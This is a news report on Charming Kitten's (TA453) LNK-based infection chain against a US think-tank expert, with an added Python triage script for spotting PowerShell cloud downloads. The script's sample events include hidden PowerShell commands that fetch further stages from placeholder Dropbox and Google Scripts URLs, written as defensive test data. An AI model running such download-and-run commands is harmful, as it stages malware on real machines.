A state-sponsored Iranian hacker group recently employed a new infection chain to target a nuclear security expert at a US think tank.
Charming Kitten, also known as TA453, APT42, Mint Sandstorm, and Yellow Garuda, has previously targeted high-value accounts in government, academia, NGOs, national security, and journalism.
In the recent operation, the IRGC-linked group first sent a benign email to establish rapport with the target, then followed up with an email containing a malicious macro that directed the target to a Dropbox URL.
“Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection. The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider,” a new analysis by Proofpoint says.
“The use of Google Scripts, Dropbox, and CleverApps demonstrates that TA453 continues to subscribe to a multi-cloud approach in its efforts to likely minimize disruptions from threat hunters. (...) Regardless of the infection method, TA453 continues to deploy modular backdoors in an effort to collect intelligence from highly targeted individuals,” Proofpoint said.
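The two infection routes described above (Explorer launching PowerShell from a double-clicked LNK, versus the older Office-macro route), both ending in a download from a cloud service, can be triaged from process-creation telemetry. This is an added example, not Proofpoint's or Microsoft's code; the host names for the cloud services and all sample events are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Cloud services named in the report; the host names are assumed here for
# illustration and are not indicators taken from the report.
CLOUD_HOSTS = ("dropbox.com", "script.google.com", "cleverapps.io")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
# PowerShell primitives that fetch a further stage; an alert also needs a cloud host.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b"
)

@dataclass
class ProcEvent:
    parent_image: str   # process that spawned this one
    image: str          # executable path of the new process
    command_line: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> "str | None":
    """'lnk_chain': PowerShell spawned by Explorer (how a double-clicked LNK runs);
    'macro_chain': PowerShell spawned by an Office app (the VBA-macro route)."""
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = ev.command_line.lower()
    if not DOWNLOAD_RE.search(cmd) or not any(h in cmd for h in CLOUD_HOSTS):
        return None
    parent = _basename(ev.parent_image)
    if parent == "explorer.exe":
        return "lnk_chain"
    if parent in OFFICE_APPS:
        return "macro_chain"
    return None

def triage(events):
    return [(classify(ev), ev) for ev in events if classify(ev)]

# Constructed sample events (not captured telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr https://www.dropbox.com/s/EXAMPLE/s2 -OutFile $env:TEMP\\s2.ps1"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell -File C:\Users\user\Documents\backup.ps1"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
              "powershell -c \"(New-Object Net.WebClient).DownloadString('https://script.google.com/macros/s/EXAMPLE/exec')\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]
```

Running `triage(SAMPLE_EVENTS)` labels the first event `lnk_chain` and the third `macro_chain`; the local script and the `cmd.exe` launch are left alone.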
In April, Microsoft warned that hackers linked to Iran are targeting critical US infrastructure including transport, energy and ports. A report by Microsoft Threat Intelligence revealed the threat from the Iranian hackers, known as "Mint Sandstorm".
A Mint Sandstorm subgroup initially engaged in reconnaissance but, in 2022, began attacking critical infrastructure organizations in the United States. In November 2021, the United States Justice Department indicted two Iranians, Mohammad Hosein Musa Kazemi and Sajjad Kashian, who were employed by Emennet Pasargad. During the 2020 presidential election, they allegedly conducted a cyber campaign "to intimidate and influence American voters".